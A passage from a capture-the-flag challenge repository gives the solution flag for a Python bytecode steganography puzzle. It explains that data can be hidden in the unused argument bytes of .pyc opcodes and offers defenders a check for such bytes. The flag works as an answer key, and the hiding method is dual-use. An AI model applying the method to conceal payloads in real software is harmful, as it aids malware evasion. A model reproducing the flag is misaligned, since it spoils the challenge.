their hard earned flag : `flag{5t3g0_ftw}` 25 | 26 | We expect players to dig into the differences between Python versions. The difference is very minor, but this challenge has huge relevance in *real world scenarios*, as any malware can basically hide shellcode inside a pyc file & extract it. 
Hence the description: either you use your hard earned leet skills indefinitely to reverse, or you think deep ;) For a defender, the same observation gives a check: the argument bytes of opcodes that take no argument are normally zero in compiler-generated bytecode, so non-zero values there are worth inspecting when a pyc file is reviewed. 27 | -------------------------------------------------------------------------------- /TrapOSaur/misc03.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/aadityapurani/My-CTF-Challenges/26fedac88ca647fef197ff62c6169534a10811cd/TrapOSaur/misc03.pyc -------------------------------------------------------------------------------- /TrapOSaur/solution/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/aadityapurani/My-CTF-Challenges/26fedac88ca647fef197ff62c6169534a10811cd/TrapOSaur/solution/README.md --------------------------------------------------------------------------------